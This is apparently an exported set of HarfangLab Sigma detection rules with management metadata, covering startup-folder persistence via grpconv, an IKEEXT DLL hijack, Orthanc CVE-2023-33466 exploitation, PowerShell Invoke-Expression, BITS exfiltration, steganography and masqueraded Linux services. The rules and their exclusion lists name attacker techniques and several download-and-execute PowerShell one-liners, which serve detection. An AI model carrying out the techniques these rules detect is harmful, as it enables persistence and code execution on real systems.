"content": "title: Persistence Added via grpconv.exe\nid: 82ba06fb-1211-48c3-b5e3-be2baf17ac1c\ndescription: |\n Detects an entry in the startup folder being created via grpconv.exe.\n Attackers can add an entry in the startup folder to achieve persistence.\n It is recommended to investigate the file created for suspicious content and to analyze the process responsible for the execution of grpconv.exe.\nreferences:\n - https://twitter.com/0gtweet/status/1526833181831200770\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/05/19\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.LOLBin.Grpconv\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\grpconv.exe'\n TargetFilename|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82ba06fb-1211-48c3-b5e3-be2baf17ac1c",
"rule_name": "Persistence Added via grpconv.exe",
"rule_description": "Detects an entry in the startup folder being created via grpconv.exe.\nAttackers can add an entry in the startup folder to achieve persistence.\nIt is recommended to investigate the file created for suspicious content and to analyze the process responsible for the execution of grpconv.exe.\n",
"rule_creation_date": "2022-05-19",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82bd1902-b17c-49f2-aff6-7b91e1340aa1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071691Z",
"creation_date": "2026-03-23T11:45:34.071693Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071698Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_ikeext_wlbsctrl.yml",
"content": "title: IKEEXT Service DLL Hijack Prepared\nid: 82bd1902-b17c-49f2-aff6-7b91e1340aa1\ndescription: |\n Detects the creation of \"C:\\Windows\\System32\\wlbsctrl.dll\".\n This DLL is not normally present on the system at this path, but the IKEEXT service tries to load it at startup.\n Attackers can place a malicious payload at this path, gaining execution each time the IKEEXT is started.\n It is recommended to investigate the content of file being written, as well as potential manual restart of the IKEEXT service to determine if this action was legitimate.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\wlbsctrl.dll'\n\n exclusion_tiworker_svchost:\n # C:\\Windows\\WinSxS\\Temp\\InFlight\\8e744265c6e9d6012163000028443044\\x86_microsoft-windows-t..-tsappsrv-component_31bf3856ad364e35_10.0.18362.1_none_e51344e8b75a8450\\TSVIPSrv.dll\n Path|contains:\n - '?:\\Windows\\WinSxS\\Temp\\InFlight'\n - '?:\\windows\\servicing\\LCU'\n - '?:\\windows\\softwaredistribution'\n\n exclusion_windowskits:\n Image: '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Deployment Tools\\WSIM\\imagecat.exe'\n Path|contains: '\\Windows\\WinSxS\\'\n\n exclusion_dism:\n Image: '?:\\Windows\\System32\\Dism.exe'\n Path|contains: '\\Windows\\WinSxS\\amd64_microsoft-windows' # C:\\Mount\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n\n exclusion_engine:\n Image:\n - '?:\\Windows\\System32\\wbengine.exe'\n - '?:\\Program Files\\Microsoft Azure Recovery Services Agent\\bin\\cbengine.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|contains: '\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_' # C:\\Mount\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n\n exclusion_setup_host:\n # C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe\n # commandline: C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe /Install /Media /InstallFile D:\\Sources\\Install.wim /MediaPath D:\n Image: '*\\Sources\\SetupHost.exe'\n # C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-n..kloadbalancing-core_31bf3856ad364e35_10.0.17763.1_none_053da3b4296868b3\\wlbsctrl.dll\n Path: '?:\\\\?WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\\\*'\n\n exclusion_docker:\n Image: '?:\\Program Files\\Docker\\Docker\\resources\\dockerd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82bd1902-b17c-49f2-aff6-7b91e1340aa1",
"rule_name": "IKEEXT Service DLL Hijack Prepared",
"rule_description": "Detects the creation of \"C:\\Windows\\System32\\wlbsctrl.dll\".\nThis DLL is not normally present on the system at this path, but the IKEEXT service tries to load it at startup.\nAttackers can place a malicious payload at this path, gaining execution each time the IKEEXT is started.\nIt is recommended to investigate the content of file being written, as well as potential manual restart of the IKEEXT service to determine if this action was legitimate.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82cb5331-4e26-4950-ac2b-847847cb226b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079439Z",
"creation_date": "2026-03-23T11:45:34.079441Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079445Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-33466",
"https://www.shielder.com/blog/2023/10/cve-2023-33466-exploiting-healthcare-servers-with-polyglot-files/",
"https://github.com/ShielderSec/poc/blob/main/CVE-2023-33466/exploit.py",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_orthanc_rce_exploitation.yml",
"content": "title: Process Spawned by Orthanc Server\nid: 82cb5331-4e26-4950-ac2b-847847cb226b\ndescription: |\n Detects the execution of a process by the Orthanc server process.\n Orthanc is an open-source DICOM (Digital Imaging and Communications in Medicine) server used to centralise and visualise medical data.\n This can be the result of the exploitation of the CVE-2023-33466 vulnerability that allows a user to overwrite arbitrary files on the system.\n Attackers can exploit this vulnerability to overwrite Orthanc's config to allow remote LUA script to be executed, resulting in a privileged remote code execution primitive.\nreferences:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-33466\n - https://www.shielder.com/blog/2023/10/cve-2023-33466-exploiting-healthcare-servers-with-polyglot-files/\n - https://github.com/ShielderSec/poc/blob/main/CVE-2023-33466/exploit.py\n - https://attack.mitre.org/techniques/T1190/\ndate: 2023/10/24\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-33466\n - classification.Windows.Exploit.Orthanc\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\Orthanc.exe'\n\n exclusion_conhost:\n OriginalFileName: 'conhost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_werfault:\n OriginalFileName: 'werfault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_orthanc:\n Image:\n - '?:\\Program Files\\Orthanc Server\\Orthanc.exe'\n - '?:\\Program Files (x86)\\icobridge-?.?\\Orthanc.exe'\n - '?:\\Program Files\\icobridge-?.?\\Orthanc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82cb5331-4e26-4950-ac2b-847847cb226b",
"rule_name": "Process Spawned by Orthanc Server",
"rule_description": "Detects the execution of a process by the Orthanc server process.\nOrthanc is an open-source DICOM (Digital Imaging and Communications in Medicine) server used to centralise and visualise medical data.\nThis can be the result of the exploitation of the CVE-2023-33466 vulnerability that allows a user to overwrite arbitrary files on the system.\nAttackers can exploit this vulnerability to overwrite Orthanc's config to allow remote LUA script to be executed, resulting in a privileged remote code execution primitive.\n",
"rule_creation_date": "2023-10-24",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82d46a9a-ed34-43b5-b6b3-c0e066ee8b96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619824Z",
"creation_date": "2026-03-23T11:45:34.619826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619830Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_ending_iex.yml",
"content": "title: Suspicious PowerShell Script Ending With Invoke-Expression\nid: 82d46a9a-ed34-43b5-b6b3-c0e066ee8b96\ndescription: |\n Detects the execution of a PowerShell script with commands ending in Invoke-Expression.\n Invoke-Expression allows attackers to execute a command passed as an argument. It is often abused by attackers to execute obfuscated or remote code in-memory.\n It is recommended to analyze the content of the script that has been executed to determine its purpose.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/03/15\nmodified: 2025/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # match all variation of spaces but can match anywhere in the script\n ScriptBlockText|re:\n - '\\| *iex'\n - '\\| *invoke-expression'\n # ensure that IEX is the last command of the script\n ScriptBlockText|endswith:\n - 'iex'\n - 'invoke-expression'\n - 'iex;'\n - 'invoke-expression;'\n\n exclusion_download_exec:\n ScriptBlockText|startswith:\n - 'iwr https://get.pnpm.io/install.ps1'\n - 'irm get.scoop.sh'\n - 'irm bun.sh/install.ps1'\n - 'irm https://get.activated.win'\n - 'irm \"https://christitus.com/win'\n - 'irm https://community.chocolatey.org/install.ps1'\n - 'irm https://claude.ai/install.ps1'\n - 'Invoke-WebRequest https://raw.githubusercontent.com/asheroto/winget-installer/master/winget-install.ps1'\n - 'irm christitus.com/win'\n - 'iwr -useb \"https://raw.githubusercontent.com/Win11Modder/Win11-Req-Bypass/main/Win11_Bypass.ps1'\n - 'irm https://deno.land/install.ps1'\n - 'irm https://aspire.dev/install.ps1'\n\n exclusion_oh_my_posh:\n ScriptBlockText|contains:\n - '?:/Users/*/AppData/Local/Programs/oh-my-posh/bin/oh-my-posh.exe'\n - '?:/Program Files (x86)/oh-my-posh/bin/oh-my-posh.exe'\n - '?:/Program Files/oh-my-posh/bin/oh-my-posh.exe'\n - 'oh-my-posh init pwsh'\n\n exclusion_servicenow:\n ScriptBlockText|startswith: 'snc-decode-command '\n ProcessParentImage|endswith: '\\bin\\java.exe'\n\n exclusion_chocolatey:\n ScriptBlockText|endswith: 'iwr https://community.chocolatey.org/install.ps1 -UseBasicParsing | iex'\n\n exclusion_connectwise_parent:\n ProcessParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_connectwise_grandparent:\n ProcessGrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_itsplatform_parent:\n ProcessParentImage: '?:\\program files (x86)\\itsplatform\\plugin\\performance\\platform-performance-plugin.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_itsplatform_grandparent:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_astral_install:\n ScriptBlockText|endswith:\n - 'irm https://astral.sh/uv/install.ps1 | iex'\n - 'irm https://astral.sh/uv/?.?.??/install.ps1 | iex'\n\n exclusion_rstudio:\n ProcessGrandparentImage: '?:\\Program Files\\RStudio\\rstudio.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82d46a9a-ed34-43b5-b6b3-c0e066ee8b96",
"rule_name": "Suspicious PowerShell Script Ending With Invoke-Expression",
"rule_description": "Detects the execution of a PowerShell script with commands ending in Invoke-Expression.\nInvoke-Expression allows attackers to execute a command passed as an argument. It is often abused by attackers to execute obfuscated or remote code in-memory.\nIt is recommended to analyze the content of the script that has been executed to determine its purpose.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82dfa65b-d6b2-4d2d-a661-450cba3121a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091702Z",
"creation_date": "2026-03-23T11:45:34.091704Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091709Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1197_bits_post.yml",
"content": "title: Suspicious BITS Upload Protocol Usage\nid: 82dfa65b-d6b2-4d2d-a661-450cba3121a1\ndescription: |\n Detects a URL request using the BITS protocol to an IP address or to a non standard port.\n Adversaries may use the BITS protocol to exfiltrate data.\n Windows has a system administration feature called the Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares.\n It is recommended to check the process responsible for the upload job and analyze the impacted computer for other malicious behavior or files.\nreferences:\n - https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/08/02\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - attack.t1571\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlVerb: 'BITS_POST'\n\n selection_ip:\n RequestUrlHost|re: '^([0-9]{1,3}\\.){3}([0-9]{1,3})$'\n\n filter_port:\n RequestUrlPort:\n - '80'\n - '443'\n\n exclusion_ivanti:\n RequestUrl|contains: ':7751/managementserver/Deployment/Events/'\n\n exclusion_ccm:\n RequestUrl|endswith:\n - '/CCM_Incoming/{????????-????-????-????-????????????}'\n - '/CCM_Incoming/%7B????????-????-????-????-????????????%7D'\n\n condition: selection and (not filter_port or selection_ip) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82dfa65b-d6b2-4d2d-a661-450cba3121a1",
"rule_name": "Suspicious BITS Upload Protocol Usage",
"rule_description": "Detects a URL request using the BITS protocol to an IP address or to a non standard port.\nAdversaries may use the BITS protocol to exfiltrate data.\nWindows has a system administration feature called the Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares.\nIt is recommended to check the process responsible for the upload job and analyze the impacted computer for other malicious behavior or files.\n",
"rule_creation_date": "2024-08-02",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197",
"attack.t1567",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82f20fc7-b480-4189-a916-5639984934a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085399Z",
"creation_date": "2026-03-23T11:45:34.085400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085405Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/peewpw/Invoke-PSImage",
"https://attack.mitre.org/techniques/T1027/003/",
"https://attack.mitre.org/techniques/T1001/002/",
"https://attack.mitre.org/software/S0231/"
],
"name": "t1027_003_powershell_steganography.yml",
"content": "title: Possible Steganography via PowerShell\nid: 82f20fc7-b480-4189-a916-5639984934a6\ndescription: |\n Detects PowerShell execution patterns associated with steganography-based payloads, where malicious code is embedded within image files' pixel data.\n This technique, commonly implemented through tools like Invoke-PSImage, allows attackers to bypass traditional detection by concealing PowerShell scripts within seemingly benign PNG files.\n The malicious payload is typically extracted from the image and executed directly in memory, making traditional file-based detection ineffective.\n It is recommended to investigate PowerShell processes interacting with image files, analyze suspicious image metadata, and perform memory forensics to identify steganography-based code.\nreferences:\n - https://github.com/peewpw/Invoke-PSImage\n - https://attack.mitre.org/techniques/T1027/003/\n - https://attack.mitre.org/techniques/T1001/002/\n - https://attack.mitre.org/software/S0231/\ndate: 2021/11/12\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.003\n - attack.command_and_control\n - attack.t1001.002\n - attack.s0231\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - 'System.Drawing.Bitmap'\n - 'System.Windows.Forms.PictureBox'\n selection_2:\n PowershellCommand|contains|all:\n - 'GetPixel'\n - '[math]::Floor'\n - '-bor'\n - '-band'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82f20fc7-b480-4189-a916-5639984934a6",
"rule_name": "Possible Steganography via PowerShell",
"rule_description": "Detects PowerShell execution patterns associated with steganography-based payloads, where malicious code is embedded within image files' pixel data.\nThis technique, commonly implemented through tools like Invoke-PSImage, allows attackers to bypass traditional detection by concealing PowerShell scripts within seemingly benign PNG files.\nThe malicious payload is typically extracted from the image and executed directly in memory, making traditional file-based detection ineffective.\nIt is recommended to investigate PowerShell processes interacting with image files, analyze suspicious image metadata, and perform memory forensics to identify steganography-based code.\n",
"rule_creation_date": "2021-11-12",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1001.002",
"attack.t1027.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "830dba8c-6d84-4973-9940-ee743a5f5105",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622043Z",
"creation_date": "2026-03-23T11:45:34.622045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622050Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1036_005_system_service_masquerade_linux.yml",
"content": "title: System Service Masqueraded\nid: 830dba8c-6d84-4973-9940-ee743a5f5105\ndescription: |\n Detects an execution of a common Linux service from a non-standard directory.\n Adversaries may try to match the name of a legitimate system binary when creating a malicious executable to evade defenses.\n It is recommended to ensure the legitimacy of the process and that is has a legitimate reason to mimick the name of a system service.\nreferences:\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_service:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_system_directories:\n Image|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/sbin/'\n - '/nix/store/*/bin/'\n\n exclusion_sshpass:\n ParentImage: '/usr/bin/sshpass'\n\n exclusion_hurukai:\n ParentImage|endswith: '/hurukai-*/hk'\n\n exclusion_snap_sshd:\n # /snap/core20/2264/usr/sbin/sshd\n Image: '/snap/core*/*/sshd'\n\n exclusion_snap_cupsd:\n # /snap/cups/1058/sbin/cupsd\n Image: '/snap/cups/*/cupsd'\n\n exclusion_strace:\n ParentImage: '/usr/bin/strace'\n\n condition: selection_service and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "830dba8c-6d84-4973-9940-ee743a5f5105",
"rule_name": "System Service Masqueraded",
"rule_description": "Detects an execution of a common Linux service from a non-standard directory.\nAdversaries may try to match the name of a legitimate system binary when creating a malicious executable to evade defenses.\nIt is recommended to ensure the legitimacy of the process and that is has a legitimate reason to mimick the name of a system service.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8317c88b-c80b-4c89-8af0-851a7ba8f0ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069666Z",
"creation_date": "2026-03-23T11:45:34.069668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_pwcrun.yml",
